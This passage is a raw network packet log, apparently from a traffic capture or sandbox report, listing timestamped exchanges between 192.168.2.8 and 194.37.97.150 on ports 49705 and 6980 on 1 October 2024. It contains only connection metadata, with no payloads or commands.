                          Oct 1, 2024 07:38:26.474282980 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.474318981 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.517688036 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517854929 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517865896 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517884016 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517899990 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517913103 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517920017 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517925978 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517930031 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517936945 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517941952 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517946959 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.517955065 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517982960 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518017054 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518027067 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518034935 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518047094 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518058062 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518078089 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518096924 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518174887 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518186092 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518197060 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518235922 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518240929 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518254995 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518255949 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518266916 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518280029 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518296957 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518318892 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518465042 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518476963 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518487930 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518498898 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518521070 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518532038 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518538952 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518543959 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518554926 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518567085 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518575907 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518590927 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518779993 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518791914 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518804073 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518821001 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518835068 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518846035 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518857002 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518868923 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518873930 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518886089 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518897057 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518907070 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518907070 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518918037 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518928051 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518946886 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.522727013 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.522738934 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.522880077 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.523046017 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.523057938 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.523068905 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.523099899 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.523140907 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.555759907 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.555907965 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.555918932 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.555929899 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.555947065 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.555958986 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.555969954 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.555975914 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.555980921 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.555988073 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.555998087 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556010962 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556039095 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556057930 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556068897 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556080103 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556083918 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556092024 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556137085 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556150913 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556169987 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556227922 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556237936 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556292057 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556361914 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556379080 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556391001 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556402922 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556410074 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556416035 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556430101 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556446075 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556451082 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556457996 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556471109 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556478024 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556482077 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556488037 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556499958 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556520939 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556541920 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556723118 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556735039 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556746960 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556757927 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556768894 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556788921 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556793928 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556807041 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556809902 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556818008 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556830883 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556842089 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556843042 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556858063 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556868076 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556888103 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.557156086 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.557167053 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.557178020 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.557192087 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.557203054 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.557210922 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.557251930 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.560858965 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.560925961 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.560988903 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.561285019 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561448097 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561459064 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561470032 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561486006 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561501026 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.561506033 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561518908 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561527967 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.561532021 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561544895 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561556101 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561567068 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561569929 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.561579943 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561590910 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561592102 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.561603069 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561614990 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.561619043 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561631918 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561641932 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.561662912 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.561664104 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561690092 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.564882994 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.564898014 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.564908981 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.564918995 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.564964056 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.564994097 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.604722977 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.604793072 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.604805946 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.604818106 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.604855061 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.604866028 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.604877949 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.604882002 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.604957104 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.604968071 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.604979992 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.604985952 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.604990005 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605005026 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605015039 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605015993 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605027914 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605031013 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605040073 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605058908 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605098963 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605263948 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605274916 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605287075 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605298042 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605309010 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605318069 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605321884 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605340958 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605353117 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605355024 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605367899 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605371952 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605422020 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605490923 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605515003 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605525970 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605542898 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605567932 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605570078 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605583906 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605593920 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605623007 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605633020 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605639935 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605644941 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605657101 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605679035 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605703115 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605849028 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605890989 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605935097 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605946064 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605957985 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605967999 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605981112 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605993032 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605993986 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.606010914 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.606045008 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.606113911 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.606127977 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.606184006 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.609678984 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.610213041 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.610225916 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.610239029 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.610251904 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.610268116 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.610300064 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.642823935 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.642837048 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.642855883 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.642936945 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.642971992 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.642982960 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.642995119 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.643003941 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.643028021 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.643033981 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.643040895 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.643052101 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.643064022 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.643074989 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.643086910 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.643096924 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.643105984 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.643110037 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.643121958 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.643134117 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.643146038 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.643157005 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.643162012 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.643189907 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.694627047 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:28.731697083 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:28.736732960 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:29.771401882 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:29.819657087 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:33.712795019 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:33.717576981 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:33.846431017 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:33.878119946 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:33.883049965 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:44.077678919 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:44.082811117 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:44.211472034 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:44.257174969 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:44.293513060 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:44.299082041 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:54.382491112 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:54.387254953 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:54.515877008 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:54.517637014 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:54.524209023 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:59.777921915 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:59.819704056 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:39:04.711010933 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:39:04.715970993 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:04.844685078 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:04.846337080 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:39:04.851113081 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:15.039366007 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:39:15.044209003 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:15.172918081 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:15.176865101 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:39:15.181749105 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:25.367280960 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:39:25.372119904 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:25.500425100 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:25.503142118 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:39:25.507977962 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:29.787231922 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:29.835419893 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:39:30.710767984 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:39:30.715667009 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:30.844276905 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:30.846498013 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:39:30.851290941 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:31.085700989 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:39:31.090693951 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:31.219063997 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:31.220824003 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:39:31.225729942 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:41.413809061 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:39:41.418755054 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:41.547533989 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:41.549588919 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:39:41.554455042 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:50.883773088 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:39:50.888653040 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:51.017560005 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:51.019270897 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:39:51.024055958 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:51.351526976 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:39:51.356910944 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:51.484674931 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:51.486892939 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:39:51.491722107 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:59.801506996 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:39:59.911252975 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:01.195288897 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:01.200941086 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:01.328879118 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:01.330625057 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:01.335516930 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:06.538973093 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:06.543919086 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:06.554613113 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:06.559547901 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:06.617191076 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:06.622126102 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:06.648617029 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:06.653589964 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:06.672378063 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:06.674792051 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:06.723860979 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:06.723934889 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:40:06.728852987 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:40:06.740624905 CEST698049705194.37.97.150192.168.2.8
